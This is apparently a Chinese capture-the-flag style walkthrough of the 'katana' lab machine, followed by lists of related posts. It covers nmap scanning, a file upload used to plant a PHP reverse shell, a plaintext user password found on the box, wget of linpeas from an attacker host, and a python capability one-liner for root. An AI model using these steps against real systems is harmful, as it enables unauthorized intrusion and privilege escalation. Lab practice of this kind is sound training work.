主机探活

nmap -sP 192.168.159.0/24

目标靶机IP为：192.168.159.183

端口探测

nmap -sV -p- -A 192.168.159.183

目标靶机开放端口为：21、22、80、139、445、7080、8088、8715

其中web服务的端口为：80、7080、8088、8715

web服务

分别访问这四个web服务的主页，发现其中三个内容一致，8715端口要求用户名密码

目录扫描

对这四个网站都进行目录扫描

8088端口存在有用信息

文件上传

存在上传页面，尝试上传文件

上传完成后，给出了文件路径与名称

但是当我访问这些目录时却提示不存在

这时想到了这几个页面首页都一致，会不会传到其他的服务上去了？挨个访问尝试

在8715端口下找到文件

然后上传php反弹shell脚本，本地开启端口监听

成功获得shell

提权

先大概进行信息收集的时候直接在 /home/katana文件夹下找到了 katana 用户的登录密码。。。

katana@katana12345

但是ssh连不了，直接su切换用户

但是登陆这个用户后进行了一系列操作（sudo、计划任务等等）都没有找到任何可用信息，于是决定上传脚本探测

上传脚本

尝试了 pspy64 脚本，没有发现可用的后台运行程序，因此上传 linpeas 脚本，查看主机可能存在的可以利用的信息

wget 192.168.159.131/linpeas.sh
chmod +x linpeas.sh

探测出了一个很有可能存在漏洞的点

查找出这个的语句为：getcap -r / 2>/dev/null

python suid提权

关于 capability 能力管理可自行上网搜索，提供参考

简单来说就是比suid等更细颗粒度的权限管理手段

/usr/bin/python2.7 -c 'import os;os.setuid(0);os.system("/bin/bash")'

成功获取root权限

katana 靶机 wp相关推荐

1. kb-vuln3 靶机 wp

   主机发现 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.177 端口探活 nmap -sV -p- -A 192.168.159.177 目标主机开放:2 ...

2. HTB Meow靶机wp

   TASK 1 首字母缩略词 VM 代表什么? VM的缩写一般是指虚拟机的意思所以答案是Virtual Machine TASK 2 我们使用什么工具与操作系统交互以启动我们的 VPN 连接? 我们在k ...

3. school 靶机 wp

   主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.176 端口发现 nmap -sV -p- -A 192.168.159.176 目标主机开放:2 ...

4. driftingblues 4 靶机 wp

   主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.186 端口扫描 nmap -sV -p- -A 192.168.159.186 目标靶机开放端口 ...

5. driftingblues 3靶机 wp

   主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.173 端口发现 nmap -sV -p- -A 192.168.159.173 目标靶机开放端口 ...

6. driftingblues靶机wp

   主机探活 nmap -sP 192.168.159.0/24 端口扫描 nmap -sV -A -p- 192.168.159.155 发现只开放了 80 和 22 端口 80端口 nikto nik ...

7. driftingblues 2靶机wp

   主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.165 端口发现 nmap -sP 192.168.159.0/24 开放端口为:21.22.80 ...

8. Mercury 靶机 wp

   主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.180 端口发现 nmap -sV -p- -A 192.168.159.180 目标主机开放端口 ...

9. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

   靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

10. 更新wpscan_解决新版wpscan无法更新数据库问题

    在做一个靶机时需要用到wpscan,然后以前学习wp漏洞的时候也有看过,但是没有强制性需要,就没管了,所以这次就想着必须给解决掉.ps:这个解决了,靶机wp马上就出来了 在网上百度了一大堆方法都不行, ...

最新文章

1. 边缘检测、霍夫变换、重映射、仿射变换、直方图均衡化
2. Spring MVC 4快速入门Maven原型得到了改进–更多Java 8功能
3. mysql5.7 至少需要1560,mysq5.7.28配置innodb_page_size错误引起的错误1071（42000）
4. CSS border-style属性
5. python用于标识类方法的是_Python类的设计与使用
6. php 防止造假ip攻击,php防止网站被攻击的应急代码
7. 使用MyBatis后，DAO层的方法还能重载吗？
8. vs2017配置pthread.h的方法
9. 心海软件学心理测试系统,心海软件－心理测试、心理档案、心理咨询室管理系统...
10. .net快速开发平台，learun敏捷开发框架
11. 【个人笔记一】ART系统类的编译解析加载探究
12. python安装numpy模块教程_python安装numpy科学计算模块
13. 云和恩墨荣获阿里云云合计划2021年度优秀伙伴技术先锋奖
14. 4016: 辉夜的夜空明珠（moon）
15. 网页连接opc服务器,远程连接opc服务器
16. dedecms图片绝对路径(附件绑定域名)的设置方法
17. A problem has occurred and the system can‘t recover问题的解决
18. Apache的配置与应用【Apache访问控制】以及apache日志管理【日志分割、awstats日志分析】
19. 2019-TOG-Adobe-(3D Ken Burns)3D ken burns effect from a single image
20. Oracle各驱动版本的区别

热门文章

1. sklearn中多种编码方式——category_encoders（one-hot多种用法）
2. App上实现用户手写签名保存为透明PNG格式图片
3. 北京外国语大学计算机考研,北京外国语大学考研难吗？一般要什么水平才可以进入？...
4. 用python解决放苹果问题_[18/11/24] 递归解决-放置苹果问题
5. pacman 查询_pacman命令
6. 家庭作业（贪心 + 并查集）
7. 管理科学与工程 国内核心期刊 国外a刊及SCI
8. 微博上看到的，小白兔系列
9. 用go填写pdf模板
10. vmware服务器虚拟化 pdf,VMware数据中心服务器虚拟化解决方案模板_V0.pdf